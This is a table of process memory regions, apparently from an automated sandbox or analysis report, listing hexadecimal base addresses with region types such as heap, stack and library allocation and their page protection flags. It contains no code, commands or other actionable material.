19D36063000
|
heap
|
page read and write
|
||
23C913D2000
|
heap
|
page read and write
|
||
185B41B4000
|
trusted library allocation
|
page read and write
|
||
1CA7B330000
|
heap
|
page read and write
|
||
1B7ECE1B000
|
heap
|
page read and write
|
||
1D807470000
|
heap
|
page read and write
|
||
1E0FE94B000
|
direct allocation
|
page read and write
|
||
202AC63D000
|
heap
|
page read and write
|
||
1B7ECB55000
|
heap
|
page read and write
|
||
1CE8FAC9000
|
heap
|
page read and write
|
||
1B7ECCD3000
|
heap
|
page read and write
|
||
1CE8FAC9000
|
heap
|
page read and write
|
||
19D35FFB000
|
heap
|
page read and write
|
||
2240CB10000
|
heap
|
page read and write
|
||
22AA5940000
|
heap
|
page read and write
|
||
1B7ECD1F000
|
heap
|
page read and write
|
||
20ED937A000
|
heap
|
page read and write
|
||
160A6284000
|
heap
|
page read and write
|
||
17DDA421000
|
heap
|
page read and write
|
||
1B7ECDBF000
|
heap
|
page read and write
|
||
1F23DE90000
|
heap
|
page read and write
|
||
1CE8FA92000
|
heap
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
7FFD9ABB0000
|
trusted library allocation
|
page read and write
|
||
1B7ECD33000
|
heap
|
page read and write
|
||
936FEFB000
|
stack
|
page read and write
|
||
1B7ECC72000
|
heap
|
page read and write
|
||
1CA38068000
|
heap
|
page read and write
|
||
160A49D2000
|
heap
|
page read and write
|
||
17ACFA30000
|
heap
|
page read and write
|
||
22CC0F6D000
|
heap
|
page read and write
|
||
160A49D7000
|
heap
|
page read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
1B7EC821000
|
heap
|
page read and write
|
||
25A1538B000
|
heap
|
page read and write
|
||
202AC182000
|
heap
|
page read and write
|
||
7FFE13244000
|
unkown
|
page execute and read and write
|
||
22AA5A02000
|
heap
|
page read and write
|
||
1E0FE9F0000
|
direct allocation
|
page read and write
|
||
1B7ED577000
|
heap
|
page read and write
|
||
1B7ECD2C000
|
heap
|
page read and write
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
7FFE1331C000
|
unkown
|
page read and write
|
||
20C32F83000
|
heap
|
page read and write
|
||
22F017E000
|
stack
|
page read and write
|
||
1B7EC79E000
|
heap
|
page read and write
|
||
1D726AF0000
|
heap
|
page read and write
|
||
160A49D4000
|
heap
|
page read and write
|
||
185A2360000
|
heap
|
page read and write
|
||
A8BBAFF000
|
stack
|
page read and write
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
17DDA500000
|
heap
|
page read and write
|
||
1CA1E172000
|
heap
|
page read and write
|
||
202AC195000
|
heap
|
page read and write
|
||
20C32F56000
|
heap
|
page read and write
|
||
1B7ECC15000
|
heap
|
page read and write
|
||
1CA216D5000
|
trusted library allocation
|
page read and write
|
||
7FFD9AAB0000
|
trusted library allocation
|
page execute and read and write
|
||
15EDF190000
|
heap
|
page read and write
|
||
22AA5947000
|
heap
|
page read and write
|
||
22AA5A09000
|
heap
|
page read and write
|
||
1CE8C9DF000
|
heap
|
page read and write
|
||
18984FC000
|
stack
|
page read and write
|
||
1B7ECDF9000
|
heap
|
page read and write
|
||
2DF515C0000
|
heap
|
page read and write
|
||
202AC643000
|
heap
|
page read and write
|
||
194D761F000
|
heap
|
page read and write
|
||
23C913BA000
|
heap
|
page read and write
|
||
1B7EC6A4000
|
heap
|
page read and write
|
||
185A3F60000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
25A14BE1000
|
heap
|
page read and write
|
||
1D726AC8000
|
heap
|
page read and write
|
||
19D36086000
|
heap
|
page read and write
|
||
1CA38140000
|
heap
|
page execute and read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
22AA7824000
|
heap
|
page read and write
|
||
2DF515A0000
|
heap
|
page read and write
|
||
25A14B00000
|
trusted library allocation
|
page read and write
|
||
1B7ECEA5000
|
heap
|
page read and write
|
||
15EDF270000
|
heap
|
page read and write
|
||
1B7ECD08000
|
heap
|
page read and write
|
||
202AC1B3000
|
heap
|
page read and write
|
||
1D728500000
|
heap
|
page read and write
|
||
19D35FF7000
|
heap
|
page read and write
|
||
1B7ECDD7000
|
heap
|
page read and write
|
||
22EFDEB000
|
stack
|
page read and write
|
||
7FFD9ACB0000
|
trusted library allocation
|
page read and write
|
||
1B7ECC04000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1B7ECC07000
|
heap
|
page read and write
|
||
5038BFF000
|
stack
|
page read and write
|
||
1B7ECF06000
|
heap
|
page read and write
|
||
1D726AE5000
|
heap
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
7FFD9AC10000
|
trusted library allocation
|
page read and write
|
||
2BAFE0A5000
|
heap
|
page read and write
|
||
22AA5F55000
|
heap
|
page read and write
|
||
2DF513D1000
|
heap
|
page read and write
|
||
1B7ECD37000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
161FEF40000
|
heap
|
page read and write
|
||
19D37F3E000
|
heap
|
page read and write
|
||
202AC1B6000
|
heap
|
page read and write
|
||
4BA3DCE000
|
stack
|
page read and write
|
||
7FFD9ACC3000
|
trusted library allocation
|
page read and write
|
||
160A44CB000
|
heap
|
page read and write
|
||
160A6286000
|
heap
|
page read and write
|
||
1CA38280000
|
heap
|
page execute and read and write
|
||
1BF9D2FD000
|
heap
|
page read and write
|
||
7FFD9A9AB000
|
trusted library allocation
|
page read and write
|
||
1B7ECCE1000
|
heap
|
page read and write
|
||
25A14BED000
|
heap
|
page read and write
|
||
5E447FF000
|
stack
|
page read and write
|
||
7FFD9AB50000
|
trusted library allocation
|
page execute and read and write
|
||
1CA1FDA0000
|
trusted library allocation
|
page read and write
|
||
1B7ECC7B000
|
heap
|
page read and write
|
||
1CA2FFAD000
|
trusted library allocation
|
page read and write
|
||
1B7EDE20000
|
direct allocation
|
page read and write
|
||
1B7ECB39000
|
heap
|
page read and write
|
||
4BA407E000
|
stack
|
page read and write
|
||
1B7ECD33000
|
heap
|
page read and write
|
||
1CA381B3000
|
heap
|
page read and write
|
||
1B7EC6A4000
|
heap
|
page read and write
|
||
4BA40FF000
|
stack
|
page read and write
|
||
194D7540000
|
heap
|
page read and write
|
||
1B7ECF49000
|
heap
|
page read and write
|
||
25A14BD6000
|
heap
|
page read and write
|
||
202AC618000
|
heap
|
page read and write
|
||
1B7ECDE8000
|
heap
|
page read and write
|
||
19D37F44000
|
heap
|
page read and write
|
||
25A14B00000
|
trusted library allocation
|
page read and write
|
||
1F4258D5000
|
heap
|
page read and write
|
||
1B7ECDCD000
|
heap
|
page read and write
|
||
1B7ECE15000
|
heap
|
page read and write
|
||
C476F8C000
|
stack
|
page read and write
|
||
22AA5F2E000
|
heap
|
page read and write
|
||
6EFDBF6000
|
stack
|
page read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
1B7ED49F000
|
heap
|
page read and write
|
||
160A49FE000
|
heap
|
page read and write
|
||
19D366A0000
|
heap
|
page read and write
|
||
1CE8FAA2000
|
heap
|
page read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
252A3B60000
|
heap
|
page read and write
|
||
1B7ED8F4000
|
direct allocation
|
page read and write
|
||
1E080691000
|
direct allocation
|
page read and write
|
||
25A14BD4000
|
heap
|
page read and write
|
||
25A16CF0000
|
heap
|
page read and write
|
||
1B7EC709000
|
heap
|
page read and write
|
||
7FF7ADE7C000
|
unkown
|
page readonly
|
||
185BC42E000
|
heap
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
1B7ECC74000
|
heap
|
page read and write
|
||
19D36055000
|
heap
|
page read and write
|
||
22CC0F4B000
|
heap
|
page read and write
|
||
1B7ECBEA000
|
heap
|
page read and write
|
||
1CE8CA28000
|
heap
|
page read and write
|
||
1E0FD0D5000
|
heap
|
page read and write
|
||
160A4A12000
|
heap
|
page read and write
|
||
202AC62F000
|
heap
|
page read and write
|
||
19D366A3000
|
heap
|
page read and write
|
||
160A43FB000
|
heap
|
page read and write
|
||
1CA1E110000
|
heap
|
page read and write
|
||
1F5215B1000
|
heap
|
page read and write
|
||
1F4256A2000
|
heap
|
page read and write
|
||
252A3A60000
|
heap
|
page read and write
|
||
1B7ECC79000
|
heap
|
page read and write
|
||
1CE8FABD000
|
heap
|
page read and write
|
||
3271CF000
|
stack
|
page read and write
|
||
23C913D2000
|
heap
|
page read and write
|
||
22AA58F0000
|
trusted library allocation
|
page read and write
|
||
19A86015000
|
heap
|
page read and write
|
||
1B7ECCF6000
|
heap
|
page read and write
|
||
1B7ED940000
|
direct allocation
|
page read and write
|
||
1B7ECC28000
|
heap
|
page read and write
|
||
185BC7CB000
|
heap
|
page read and write
|
||
25A14BB4000
|
heap
|
page read and write
|
||
1B7EE040000
|
heap
|
page read and write
|
||
1CE8CA2D000
|
heap
|
page read and write
|
||
7FFD9AD83000
|
trusted library allocation
|
page read and write
|
||
1B7ECE70000
|
heap
|
page read and write
|
||
251C6ADA000
|
heap
|
page read and write
|
||
1BF9D1C0000
|
heap
|
page read and write
|
||
2A1D179000
|
stack
|
page read and write
|
||
7FFDFB1A0000
|
unkown
|
page read and write
|
||
19D35FF3000
|
heap
|
page read and write
|
||
1B7ECDD0000
|
heap
|
page read and write
|
||
74B69E5000
|
stack
|
page read and write
|
||
1B7ECC43000
|
heap
|
page read and write
|
||
194D7668000
|
heap
|
page read and write
|
||
2240CA31000
|
heap
|
page read and write
|
||
19A85D81000
|
heap
|
page read and write
|
||
1CA1E250000
|
trusted library allocation
|
page read and write
|
||
1EAC1D11000
|
heap
|
page read and write
|
||
1B7ECE79000
|
heap
|
page read and write
|
||
7FFD9AB32000
|
trusted library allocation
|
page read and write
|
||
7FF7E2FB9000
|
unkown
|
page write copy
|
||
1D728460000
|
heap
|
page read and write
|
||
1F4255A0000
|
heap
|
page read and write
|
||
1B7EDE30000
|
direct allocation
|
page read and write
|
||
1A2AB160000
|
heap
|
page read and write
|
||
1B7EC6B0000
|
heap
|
page read and write
|
||
160A44C5000
|
heap
|
page read and write
|
||
1A2AB100000
|
heap
|
page read and write
|
||
1B7EC6A4000
|
heap
|
page read and write
|
||
202AC1A5000
|
heap
|
page read and write
|
||
19D366B9000
|
heap
|
page read and write
|
||
185A58C2000
|
trusted library allocation
|
page read and write
|
||
1B7ECBD9000
|
heap
|
page read and write
|
||
185BC43A000
|
heap
|
page read and write
|
||
1BEA7C40000
|
heap
|
page read and write
|
||
1CE8FAB4000
|
heap
|
page read and write
|
||
1E0FCFA0000
|
heap
|
page read and write
|
||
1BEA7C9A000
|
heap
|
page read and write
|
||
7FFD9A9EC000
|
trusted library allocation
|
page execute and read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
17ACFC90000
|
heap
|
page read and write
|
||
1D726AE5000
|
heap
|
page read and write
|
||
1B7EC30F000
|
heap
|
page read and write
|
||
1B7ECC82000
|
heap
|
page read and write
|
||
1CE8C9AF000
|
heap
|
page read and write
|
||
185BC71E000
|
heap
|
page read and write
|
||
1B7ECE1C000
|
heap
|
page read and write
|
||
19D366C4000
|
heap
|
page read and write
|
||
1B7EC6B3000
|
heap
|
page read and write
|
||
7FFD9AB4A000
|
trusted library allocation
|
page read and write
|
||
202AC641000
|
heap
|
page read and write
|
||
7FFDFAD27000
|
unkown
|
page execute and read and write
|
||
1CA7B13B000
|
heap
|
page read and write
|
||
25A14E1B000
|
heap
|
page read and write
|
||
25A14AE0000
|
heap
|
page read and write
|
||
160A43CC000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
19D366A4000
|
heap
|
page read and write
|
||
1B7EDA0C000
|
direct allocation
|
page read and write
|
||
7FFD9AC50000
|
trusted library allocation
|
page read and write
|
||
25A15384000
|
heap
|
page read and write
|
||
1B7ECC2F000
|
heap
|
page read and write
|
||
7FFD9AC40000
|
trusted library allocation
|
page read and write
|
||
C50AD5E000
|
stack
|
page read and write
|
||
160A4A0F000
|
heap
|
page read and write
|
||
7FFE1324C000
|
unkown
|
page read and write
|
||
19D3602C000
|
heap
|
page read and write
|
||
2A1D378000
|
stack
|
page read and write
|
||
1B7ECF59000
|
heap
|
page read and write
|
||
1CE8FABD000
|
heap
|
page read and write
|
||
7FF7ADE8F000
|
unkown
|
page write copy
|
||
22AA59F6000
|
heap
|
page read and write
|
||
1B7ED167000
|
heap
|
page read and write
|
||
23C91230000
|
heap
|
page read and write
|
||
1F397B20000
|
heap
|
page read and write
|
||
19D36063000
|
heap
|
page read and write
|
||
1B7ECDE8000
|
heap
|
page read and write
|
||
202AC620000
|
heap
|
page read and write
|
||
160A4A15000
|
heap
|
page read and write
|
||
22AA5F53000
|
heap
|
page read and write
|
||
13A072F5000
|
heap
|
page read and write
|
||
20C32F8B000
|
heap
|
page read and write
|
||
202AE1E0000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
22AA59E0000
|
heap
|
page read and write
|
||
6ABD2FF000
|
unkown
|
page read and write
|
||
167DB065000
|
heap
|
page read and write
|
||
202AC734000
|
heap
|
page read and write
|
||
25A15399000
|
heap
|
page read and write
|
||
1F4256BB000
|
heap
|
page read and write
|
||
22CC0F45000
|
heap
|
page read and write
|
||
1B7ECD26000
|
heap
|
page read and write
|
||
1F4256A0000
|
heap
|
page read and write
|
||
1FA18E70000
|
heap
|
page read and write
|
||
1E080530000
|
direct allocation
|
page read and write
|
||
7FFE14631000
|
unkown
|
page execute and read and write
|
||
5038B7F000
|
stack
|
page read and write
|
||
22AA59F6000
|
heap
|
page read and write
|
||
19D3607F000
|
heap
|
page read and write
|
||
22CC0F7C000
|
heap
|
page read and write
|
||
4BA41FF000
|
stack
|
page read and write
|
||
1B7EC77D000
|
heap
|
page read and write
|
||
1FA18E96000
|
heap
|
page read and write
|
||
160A43F3000
|
heap
|
page read and write
|
||
2B6D15B000
|
stack
|
page read and write
|
||
1B7ED4A2000
|
heap
|
page read and write
|
||
CD7E9FF000
|
stack
|
page read and write
|
||
1B7ECD31000
|
heap
|
page read and write
|
||
1B7ED49F000
|
heap
|
page read and write
|
||
19D37F32000
|
heap
|
page read and write
|
||
1B7EC38F000
|
heap
|
page read and write
|
||
20C32F67000
|
heap
|
page read and write
|
||
160A43CC000
|
heap
|
page read and write
|
||
1B7ECDC0000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
1B7ECCBA000
|
heap
|
page read and write
|
||
2240CA31000
|
heap
|
page read and write
|
||
1B7ECBD2000
|
heap
|
page read and write
|
||
1B7EDE40000
|
direct allocation
|
page read and write
|
||
1FBE3B30000
|
heap
|
page read and write
|
||
142339A0000
|
heap
|
page read and write
|
||
1EAC1CFA000
|
heap
|
page read and write
|
||
1B7ECD51000
|
heap
|
page read and write
|
||
25A14BB0000
|
heap
|
page read and write
|
||
1B7EC3D4000
|
heap
|
page read and write
|
||
1B7ECC2E000
|
heap
|
page read and write
|
||
1B7EC63E000
|
heap
|
page read and write
|
||
17ACFB9A000
|
heap
|
page read and write
|
||
7FFE14643000
|
unkown
|
page execute and read and write
|
||
19D366B9000
|
heap
|
page read and write
|
||
1E080710000
|
direct allocation
|
page read and write
|
||
7FFD9AD30000
|
trusted library allocation
|
page read and write
|
||
A457FF000
|
unkown
|
page read and write
|
||
25A14B87000
|
heap
|
page read and write
|
||
160A4460000
|
heap
|
page read and write
|
||
7FFD9AA4C000
|
trusted library allocation
|
page execute and read and write
|
||
1B7ECC97000
|
heap
|
page read and write
|
||
251C6AF0000
|
heap
|
page read and write
|
||
1B7ECF13000
|
heap
|
page read and write
|
||
1E0FD109000
|
heap
|
page read and write
|
||
1B7ECB21000
|
heap
|
page read and write
|
||
1D726C90000
|
heap
|
page read and write
|
||
167DAEC0000
|
heap
|
page read and write
|
||
1B7EDD80000
|
direct allocation
|
page read and write
|
||
7FFDFAC9A000
|
unkown
|
page read and write
|
||
7FF7E2FA0000
|
unkown
|
page readonly
|
||
160A49D3000
|
heap
|
page read and write
|
||
22AA5A12000
|
heap
|
page read and write
|
||
22AA5A09000
|
heap
|
page read and write
|
||
19D36046000
|
heap
|
page read and write
|
||
1A2AB1B1000
|
heap
|
page read and write
|
||
19D36051000
|
heap
|
page read and write
|
||
22AA781D000
|
heap
|
page read and write
|
||
19D36077000
|
heap
|
page read and write
|
||
19D3604F000
|
heap
|
page read and write
|
||
1B7ECDDB000
|
heap
|
page read and write
|
||
1B7ECDF9000
|
heap
|
page read and write
|
||
160A43FB000
|
heap
|
page read and write
|
||
160A443C000
|
heap
|
page read and write
|
||
25A16D0E000
|
heap
|
page read and write
|
||
7FFDFACB2000
|
unkown
|
page execute and read and write
|
||
1CE8E326000
|
heap
|
page read and write
|
||
1F23DEC0000
|
heap
|
page read and write
|
||
1D726AF3000
|
heap
|
page read and write
|
||
202AC1B3000
|
heap
|
page read and write
|
||
7FFD9A993000
|
trusted library allocation
|
page execute and read and write
|
||
1CE8C9B1000
|
heap
|
page read and write
|
||
7FF7ADE50000
|
unkown
|
page readonly
|
||
1DFCFF000
|
unkown
|
page read and write
|
||
1B7ECCD9000
|
heap
|
page read and write
|
||
7FFD9AB74000
|
trusted library allocation
|
page read and write
|
||
25A14BE6000
|
heap
|
page read and write
|
||
160A49EC000
|
heap
|
page read and write
|
||
1B7ECD70000
|
heap
|
page read and write
|
||
17DDA320000
|
heap
|
page read and write
|
||
2245E790000
|
heap
|
page read and write
|
||
1CA1E270000
|
heap
|
page read and write
|
||
6AC8A93000
|
stack
|
page read and write
|
||
1B7ECC84000
|
heap
|
page read and write
|
||
1F397B57000
|
heap
|
page read and write
|
||
1B7ECDF0000
|
heap
|
page read and write
|
||
7FFD9A9A0000
|
trusted library allocation
|
page read and write
|
||
19D36083000
|
heap
|
page read and write
|
||
1B7EC6B9000
|
heap
|
page read and write
|
||
19D37F30000
|
heap
|
page read and write
|
||
7FFD9AB72000
|
trusted library allocation
|
page read and write
|
||
1CA2175B000
|
trusted library allocation
|
page read and write
|
||
7FFD9AC70000
|
trusted library allocation
|
page read and write
|
||
7FFD9ACE0000
|
trusted library allocation
|
page read and write
|
||
161FEF61000
|
heap
|
page read and write
|
||
7FFE1324A000
|
unkown
|
page execute and write copy
|
||
22AA7810000
|
heap
|
page read and write
|
||
13B45611000
|
heap
|
page read and write
|
||
20C32F7C000
|
heap
|
page read and write
|
||
1B7ECCDD000
|
heap
|
page read and write
|
||
25A14BD2000
|
heap
|
page read and write
|
||
19D36065000
|
heap
|
page read and write
|
||
6AC937E000
|
stack
|
page read and write
|
||
7FFDFAC94000
|
unkown
|
page execute and read and write
|
||
1B7ECCD9000
|
heap
|
page read and write
|
||
185B433F000
|
trusted library allocation
|
page read and write
|
||
7FFDFB049000
|
unkown
|
page execute and read and write
|
||
7FF7ADE51000
|
unkown
|
page execute read
|
||
19D35FFA000
|
heap
|
page read and write
|
||
202AC735000
|
heap
|
page read and write
|
||
202AC732000
|
heap
|
page read and write
|
||
202AC73A000
|
heap
|
page read and write
|
||
1B7ECD0D000
|
heap
|
page read and write
|
||
22AA5905000
|
heap
|
page read and write
|
||
20C32F30000
|
heap
|
page read and write
|
||
7FFE148E8000
|
unkown
|
page read and write
|
||
7FFE13311000
|
unkown
|
page execute and read and write
|
||
7DF4D42D0000
|
trusted library allocation
|
page execute and read and write
|
||
1B7EC6C2000
|
heap
|
page read and write
|
||
1B7ECE31000
|
heap
|
page read and write
|
||
1CE8CA2B000
|
heap
|
page read and write
|
||
19D37F3E000
|
heap
|
page read and write
|
||
202AC649000
|
heap
|
page read and write
|
||
1B7ECC43000
|
heap
|
page read and write
|
||
19D38120000
|
heap
|
page read and write
|
||
1B7EDA20000
|
direct allocation
|
page read and write
|
||
1B7ECD3F000
|
heap
|
page read and write
|
||
160A4A10000
|
heap
|
page read and write
|
||
1BEA7CA9000
|
heap
|
page read and write
|
||
1B7ECC79000
|
heap
|
page read and write
|
||
22AA781D000
|
heap
|
page read and write
|
||
1B7ECD39000
|
heap
|
page read and write
|
||
1B7EC6CD000
|
heap
|
page read and write
|
||
1B7ECD33000
|
heap
|
page read and write
|
||
1F8A3CB0000
|
heap
|
page read and write
|
||
1B7ECE6F000
|
heap
|
page read and write
|
||
1B7ECD33000
|
heap
|
page read and write
|
||
202AC627000
|
heap
|
page read and write
|
||
1B7ECCD5000
|
heap
|
page read and write
|
||
25A15377000
|
heap
|
page read and write
|
||
22AA5A16000
|
heap
|
page read and write
|
||
2240CA28000
|
heap
|
page read and write
|
||
1AABE350000
|
heap
|
page read and write
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
1B7EDE00000
|
direct allocation
|
page read and write
|
||
160A6294000
|
heap
|
page read and write
|
||
25A14E1A000
|
heap
|
page read and write
|
||
1E0FD000000
|
heap
|
page read and write
|
||
1B7EC1F0000
|
direct allocation
|
page read and write
|
||
2BAFE098000
|
heap
|
page read and write
|
||
1CE8C7C0000
|
heap
|
page read and write
|
||
160A4A12000
|
heap
|
page read and write
|
||
1B7ECCCD000
|
heap
|
page read and write
|
||
1B7EC6A0000
|
heap
|
page read and write
|
||
185A579B000
|
trusted library allocation
|
page read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
1B7EDE00000
|
direct allocation
|
page read and write
|
||
13A07030000
|
heap
|
page read and write
|
||
8520CFF000
|
unkown
|
page read and write
|
||
22CC0F28000
|
heap
|
page read and write
|
||
1B7ECDE0000
|
heap
|
page read and write
|
||
1B7EC78C000
|
heap
|
page read and write
|
||
7FFDFB186000
|
unkown
|
page execute and read and write
|
||
7FFDFB88C000
|
unkown
|
page execute and read and write
|
||
185A2630000
|
heap
|
page execute and read and write
|
||
9187E7E000
|
stack
|
page read and write
|
||
1F42569E000
|
heap
|
page read and write
|
||
1B7ECC2C000
|
heap
|
page read and write
|
||
19D3606B000
|
heap
|
page read and write
|
||
7FFE148E9000
|
unkown
|
page readonly
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
1B7EC38E000
|
heap
|
page read and write
|
||
202AC641000
|
heap
|
page read and write
|
||
2739F73B000
|
heap
|
page read and write
|
||
1B7ECD24000
|
heap
|
page read and write
|
||
7FF7E2FBA000
|
unkown
|
page read and write
|
||
1B7ECD41000
|
heap
|
page read and write
|
||
22CC0F6D000
|
heap
|
page read and write
|
||
821117F000
|
stack
|
page read and write
|
||
1CE8FAB2000
|
heap
|
page read and write
|
||
1B7ECCD6000
|
heap
|
page read and write
|
||
1F397B50000
|
heap
|
page read and write
|
||
25A14BC2000
|
heap
|
page read and write
|
||
1E0FE9D0000
|
direct allocation
|
page read and write
|
||
1B7ECCF8000
|
heap
|
page read and write
|
||
1CE8FADE000
|
heap
|
page read and write
|
||
6AC8E7E000
|
stack
|
page read and write
|
||
185A268A000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
1B7ECD19000
|
heap
|
page read and write
|
||
1B7ECE72000
|
heap
|
page read and write
|
||
160A4A12000
|
heap
|
page read and write
|
||
7FFDFB899000
|
unkown
|
page execute and write copy
|
||
1FA18E96000
|
heap
|
page read and write
|
||
7FFE13380000
|
unkown
|
page readonly
|
||
1D726AE4000
|
heap
|
page read and write
|
||
202AC169000
|
heap
|
page read and write
|
||
1B7ECBD2000
|
heap
|
page read and write
|
||
1B7ECD47000
|
heap
|
page read and write
|
||
1CE8E326000
|
heap
|
page read and write
|
||
1B7ECE15000
|
heap
|
page read and write
|
||
1B7ECC76000
|
heap
|
page read and write
|
||
22AA7824000
|
heap
|
page read and write
|
||
20C32F5B000
|
heap
|
page read and write
|
||
19D35FD0000
|
trusted library allocation
|
page read and write
|
||
1B7ECDF2000
|
heap
|
page read and write
|
||
1F397CA0000
|
heap
|
page read and write
|
||
290E5A10000
|
heap
|
page read and write
|
||
13B45510000
|
heap
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
1B7EC7D0000
|
heap
|
page read and write
|
||
25A14B30000
|
heap
|
page read and write
|
||
194D769A000
|
heap
|
page read and write
|
||
185A253D000
|
heap
|
page read and write
|
||
1B7ECEDF000
|
heap
|
page read and write
|
||
22AA594A000
|
heap
|
page read and write
|
||
7FFDFF301000
|
unkown
|
page execute and write copy
|
||
1AABE2F0000
|
heap
|
page read and write
|
||
202AE034000
|
heap
|
page read and write
|
||
252A3BB1000
|
heap
|
page read and write
|
||
1B7EC681000
|
heap
|
page read and write
|
||
2A1CD03000
|
stack
|
page read and write
|
||
1A2AB1B1000
|
heap
|
page read and write
|
||
1B7EC2F0000
|
heap
|
page read and write
|
||
22CC0F7C000
|
heap
|
page read and write
|
||
2AD315D0000
|
heap
|
page read and write
|
||
22AA5945000
|
heap
|
page read and write
|
||
22AA5F38000
|
heap
|
page read and write
|
||
7FFD9A99D000
|
trusted library allocation
|
page execute and read and write
|
||
19D366A5000
|
heap
|
page read and write
|
||
1B7ECD28000
|
heap
|
page read and write
|
||
7FFE0044C000
|
unkown
|
page execute and read and write
|
||
185A3F71000
|
trusted library allocation
|
page read and write
|
||
1B7ECF38000
|
heap
|
page read and write
|
||
1CE90614000
|
heap
|
page read and write
|
||
185BC7AA000
|
heap
|
page read and write
|
||
142338AB000
|
heap
|
page read and write
|
||
19D36063000
|
heap
|
page read and write
|
||
1B7EC6C5000
|
heap
|
page read and write
|
||
1B7EC6A2000
|
heap
|
page read and write
|
||
19D36078000
|
heap
|
page read and write
|
||
1B7EC6EC000
|
heap
|
page read and write
|
||
160A4446000
|
heap
|
page read and write
|
||
22AA5947000
|
heap
|
page read and write
|
||
7FFD9AD20000
|
trusted library allocation
|
page read and write
|
||
160A42F0000
|
heap
|
page read and write
|
||
202AC620000
|
heap
|
page read and write
|
||
837EBDB000
|
stack
|
page read and write
|
||
D7F710F000
|
stack
|
page read and write
|
||
1FA18EC9000
|
heap
|
page read and write
|
||
1BF9D2FE000
|
heap
|
page read and write
|
||
7FFD9AB72000
|
trusted library allocation
|
page read and write
|
||
19D36080000
|
heap
|
page read and write
|
||
1F23DF70000
|
heap
|
page read and write
|
||
1B7ECE1B000
|
heap
|
page read and write
|
||
2240C930000
|
heap
|
page read and write
|
||
19D36027000
|
heap
|
page read and write
|
||
1B7EC830000
|
direct allocation
|
page read and write
|
||
202AC100000
|
trusted library allocation
|
page read and write
|
||
1EAC1FA0000
|
heap
|
page read and write
|
||
202AC649000
|
heap
|
page read and write
|
||
1E0FD151000
|
heap
|
page read and write
|
||
1B7ED47F000
|
heap
|
page read and write
|
||
7FFE13342000
|
unkown
|
page execute and write copy
|
||
202AC639000
|
heap
|
page read and write
|
||
1E0FD14E000
|
heap
|
page read and write
|
||
1B7ECA31000
|
heap
|
page read and write
|
||
2DF513B0000
|
heap
|
page read and write
|
||
1F425670000
|
heap
|
page read and write
|
||
1F23DF70000
|
heap
|
page read and write
|
||
1CE8FB37000
|
heap
|
page read and write
|
||
7FFDFAC2E000
|
unkown
|
page execute and read and write
|
||
5E4435C000
|
stack
|
page read and write
|
||
1B7ECBD2000
|
heap
|
page read and write
|
||
1B7ED49D000
|
heap
|
page read and write
|
||
955CB7F000
|
stack
|
page read and write
|
||
1B7EC31A000
|
heap
|
page read and write
|
||
1B7ECD01000
|
heap
|
page read and write
|
||
20C32E55000
|
heap
|
page read and write
|
||
1CA219DF000
|
trusted library allocation
|
page read and write
|
||
202AC624000
|
heap
|
page read and write
|
||
1CE8FAA2000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
13B45800000
|
heap
|
page read and write
|
||
1B7EDE00000
|
direct allocation
|
page read and write
|
||
22AA5F49000
|
heap
|
page read and write
|
||
1F4256CD000
|
heap
|
page read and write
|
||
11C921D0000
|
heap
|
page read and write
|
||
830363F000
|
stack
|
page read and write
|
||
1B7EA8E6000
|
heap
|
page read and write
|
||
28937C40000
|
heap
|
page read and write
|
||
19D366B9000
|
heap
|
page read and write
|
||
1F5214F0000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
1B7ECDDB000
|
heap
|
page read and write
|
||
1E0FE933000
|
direct allocation
|
page read and write
|
||
1B7EDDC0000
|
direct allocation
|
page read and write
|
||
11C921C9000
|
heap
|
page read and write
|
||
1E0FD050000
|
direct allocation
|
page read and write
|
||
2A1D6FE000
|
stack
|
page read and write
|
||
2A1E1CE000
|
stack
|
page read and write
|
||
1CA202C8000
|
trusted library allocation
|
page read and write
|
||
1B7ED89C000
|
direct allocation
|
page read and write
|
||
1B7ECC18000
|
heap
|
page read and write
|
||
955CA7E000
|
stack
|
page read and write
|
||
3F82EFF000
|
stack
|
page read and write
|
||
161FEF61000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1CA1E199000
|
heap
|
page read and write
|
||
160A49FE000
|
heap
|
page read and write
|
||
160A4436000
|
heap
|
page read and write
|
||
202AC198000
|
heap
|
page read and write
|
||
1B7ECD81000
|
heap
|
page read and write
|
||
1B7ECDE1000
|
heap
|
page read and write
|
||
1B7EC331000
|
heap
|
page read and write
|
||
1B7ECDD7000
|
heap
|
page read and write
|
||
1B7ECD24000
|
heap
|
page read and write
|
||
1B7ECCC9000
|
heap
|
page read and write
|
||
185A2600000
|
trusted library allocation
|
page read and write
|
||
19A85D79000
|
heap
|
page read and write
|
||
1B7ECC7A000
|
heap
|
page read and write
|
||
1B7ECDCE000
|
heap
|
page read and write
|
||
1B7ECCF1000
|
heap
|
page read and write
|
||
20C32F7F000
|
heap
|
page read and write
|
||
194D7644000
|
heap
|
page read and write
|
||
7FF7E2FA0000
|
unkown
|
page readonly
|
||
7FFD9A994000
|
trusted library allocation
|
page read and write
|
||
1FA18E30000
|
heap
|
page read and write
|
||
1CE8E335000
|
heap
|
page read and write
|
||
160A49FE000
|
